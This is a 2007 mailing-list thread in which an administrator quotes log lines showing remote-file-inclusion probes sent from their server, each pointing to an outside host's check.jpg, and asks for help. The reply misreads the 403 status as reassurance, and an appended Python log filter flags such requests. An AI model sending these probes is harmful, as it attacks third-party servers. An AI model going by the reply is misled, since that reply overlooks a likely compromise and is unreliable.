On Tue, Jul 10, 2007 at 01:55:54AM -0000, rocky wrote:
> Hey list,
>
> Currently, we get some notice about someone is using our server doing
> injection attacks against other servers.
>
> Below are some log files they sent to us
> $------------------Snap begin---------------------------$
> our.server.ip.address - - [09/Jul/2007:00:31:43 +0200] "GET //.comhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7414 "-" "Mozilla/5.0"
> our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415 "-" "Mozilla/5.0"
> our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET //.brhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7413 "-" "Mozilla/5.0"
> $----------------snap end---------------------------------$
>
> Unfortunately, the person who is in charge of server maintaining is
> away now and we can not get hold of him. Can any of you give me some
> direction on how to track down the security hole and eliminate it
> please?
>
> Thanks a lot in advance!
>

Well, if all the requests are getting a 403 response like the ones you
have snipped, then I wouldn't worry. The 403 code means "forbidden", so
your server is not allowing the access anyways and only logging it.

Regards,

-Roberto

-- 
Roberto C. Sánchez
http://people.connexer.com/~roberto
http://www.connexer.com
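An added example, not part of the original thread: a small Python filter that parses access-log lines in the format quoted above and flags requests whose target embeds an absolute URL, counting them per client address and response status. The function names are illustrative, and the last two sample lines are constructed.

```python
import re
from collections import Counter

# Apache combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
SCHEME_RE = re.compile(r'(?:https?|ftp)://', re.IGNORECASE)

# The first three lines come from the thread's excerpt (mail wrapping undone);
# the last two are constructed for this example.
SAMPLE = [
    'our.server.ip.address - - [09/Jul/2007:00:31:43 +0200] "GET //.comhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7414 "-" "Mozilla/5.0"',
    'our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET //.infohttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7415 "-" "Mozilla/5.0"',
    'our.server.ip.address - - [09/Jul/2007:00:38:01 +0200] "GET //.brhttp://http://chapolin.110mb.com/check.jpg? HTTP/1.0" 403 7413 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [09/Jul/2007:00:40:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [09/Jul/2007:00:41:00 +0200] "GET //.nethttp://http://example.invalid/check.jpg? HTTP/1.0" 200 512 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Return host, target and integer status for one log line, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {"host": m["host"], "target": m["target"], "status": int(m["status"])}

def embedded_url(target):
    """Return the innermost absolute URL inside a request target, or None."""
    starts = [m.start() for m in SCHEME_RE.finditer(target)]
    return target[starts[-1]:] if starts else None

def flag_embedded_urls(lines):
    """List (client, status, url) for requests whose target embeds a URL."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not an access-log line
        url = embedded_url(rec["target"])
        if url is not None:
            findings.append((rec["host"], rec["status"], url))
    return findings

def summarize(findings):
    """Count flagged requests per (client, status) pair."""
    return Counter((host, status) for host, status, _ in findings)

if __name__ == "__main__":
    for (host, status), n in sorted(summarize(flag_embedded_urls(SAMPLE)).items()):
        print(f"{host}\tstatus={status}\trequests={n}")
```

The first field of each entry is the client that sent the request and the status is the answer given by the server that wrote the log, so the per-client, per-status counts show which flagged requests were refused and which were served.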